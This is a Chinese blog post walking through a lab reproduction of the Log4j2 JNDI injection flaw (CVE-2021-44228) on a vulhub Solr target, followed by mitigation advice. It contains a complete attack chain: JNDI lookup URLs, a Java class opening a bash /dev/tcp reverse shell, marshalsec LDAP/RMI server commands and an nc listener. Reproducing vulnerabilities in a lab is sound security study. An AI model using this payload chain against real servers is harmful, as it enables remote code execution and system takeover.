Apache log4j2漏洞复现

最新推荐文章于 2024-04-29 00:09:55 发布
最新推荐文章于 2024-04-29 00:09:55 发布
阅读量211 收藏 1
点赞数
文章标签: apache log4j java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63610715/article/details/132920159
版权

什么是log4j2

        Apache log4j2 是java应用常见的开源日志库,是一个就java的日志记录工具,用来记录日志信息的

漏洞原理

        lookup查询服务提供了对{ }字段的解析功能,该模块在输出日志时允许攻击者通过相应的协议去请求远程主机上的资源,而在处理数据时并没有对用户输入的信息进行判断,攻击者可以利用这一点进行JNDI注入,使受害者请求远程服务来链接本地对象,从而调用JNDI服务(LDAP/RMI)获取恶意的.class文件,造成远程代码执行

PS:JNDI 全称java命名和目录接口,允许从指定的远程服务器获取并加载对象

影响到的组件

Apache Struts2

Apache Solr

Apache Druid

Apache Flink

spring-boot-strater-log4j2

 漏洞复现

启动环境

进入vulhub靶场并启动环境

cd vulhub-master/log4j/CVE-2021-44228/

docker compose up -d

 启动环境时,发现出现下面报出,说明要使用root权限启动,

所以要su到root下执行

 环境拉取成功

使用浏览器进行访问,端口为8983

检测漏洞

拼接路径进行访问检测漏洞是否存在,这里配合DNS回显检测

http://192.168.0.154:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.w78upc.dnslog.cn}

编写恶意类

编写一个名为Exploit.java的文件

代码中我们希望将shell反弹到192.168.0.154主机的5555端口

public class Exploit {
    public Exploit(){
        try{
            String[] commands = {"bash","-c","exec 5<>/dev/tcp/192.168.0.154/5555;cat <&5 | while read line; do $line 2>&5 >&5;done"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch(Exception e){
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}

保存后,将其编译为 .class 文件

javac Exploit.java

若出现下面情况,证明此时靶机还没有安装java

 

使用下面命令安装java

yum install -y java-1.8.0-openjdk-devel.x86_64

 安装好后再进行编译,发现编译成功

在 Exploit.class文件所在目录开启web服务

python3 -m http.server

如果没有安装python3 使用以下命令进行安装

yum install -y python3

 

开启JNDI服务

        另开一个窗口开JNDI服务

使用marshalsec项目,启动服务    项目下载地址:https://github.com/mbechler/marshalsec 

 LDAP服务启动

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.0.154:8000/#Exploit" 1389

 RMI服务启动

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.154:8000/#Exploit" 8888

 ps:以上两种服务选择启动哪个服务都行,注意要更改ip中的内容为启动的web服务地址

监听反弹

        监听之前Exploit.java里面写的反弹shell的端口5555(再重新开启一个窗口)

nc -lvnp 5555

 

开始攻击

在注入点进行JNDI注入

http://192.168.0.154:8983/solr/admin/cores?action=${jndi:ldap://192.168.0.154:1389/Exploit}

 

修复建议

1、升级Apache Log4j2所有相关应⽤到最新的log4j-2.15.0-rc2版本

2.升级已知受影响的应⽤及组件,如srping-boot-strater-log4j2/Apache Solr/Apache F link/Apache Druid

3.jvm参数-Dlog4j2.formatMsgNoLookups:=true

4.log4j2.formatMsgNoLookups=True

5.系统环境变量FORMAT MESSAGES PATTERN DISABLE LOOKUPS设置为true

6.禁⽌使⽤引og4j的服务器外连出⽹

7.使⽤⾼版本jdk (如 jdk11.0.1、8u191、7u201、6u211或更⾼版本) , 因为⾼版本jdk默认⽆法利⽤jndi注⼊

unlash~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Apache Log4j2漏洞复现
MoCoCN的博客
12-22 2917
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01漏洞描述 Apache Log4j2是一款优秀的
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9829
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 7392
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2远程代码执行漏洞原理及复现
最新发布
m0_57967573的博客
04-29 1510
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 2103
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Log4j2漏洞复现(CVE-2021-44228)
鹿鸣天涯
01-13 629
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。
apache log4j 2(CVE-2021-44228)漏洞复现
net的博客
04-04 873
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
Apache Log4j2紧急缓解措施.docx
12-16
Apache Log4j2 是一个流行的 Java 日志记录工具,但最近出现了严重的安全漏洞Apache Log4j2 紧急缓解措施旨在帮助开发者尽快修复该漏洞,避免攻击者的攻击。 一、修改启动脚本 在启动 Java 应用程序时,添加一...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
漏洞复现】2.Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现及分析
Zichel77的博客
03-21 1433
Apache 是当今世界上非常流行的跨平台Web服务端,有着良好的扩充性。而Log4j则是Apache的开源组件,用于日志管理,功能强大。Log4j来源于 Apache 软件基金会的日志服务项目,是一种Java日志框架,从最初Log4j1发展到现在的Log4j2,已经广泛应用于各行各业的业务开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞
Apache Log4j2历史漏洞复现
懂进攻知防守
07-30 1684
Apache Log4j2漏洞简介: log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
手把手教你复现apache log4j2 漏洞
叶新东老师的博客
12-15 4549
前言 因为log4j2java的日志框架, 所在这边也使用java进行测试,需要注意的是,log4j2的版本从2.0 ~ 2.14.1之间都是有安全漏洞的, 在2.15版本(包含2.15)后就已经修复了这个漏洞;所以我们在复现时只要版本不超过2.15即可; 准备 在复现前,需要先准备以下几样东西 nginx:无版本限制 Intellij idea :用来编写jmdi 服务端代码,和测试log日志 log4j 依赖:(maven自动下载) 开整 因为是远程执行漏洞嘛,所以肯定需要用到不同的工程,这里准备
Log4j2漏洞复现
热门推荐
weixin_51519028的博客
08-12 1万+
Apache Log4j2Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值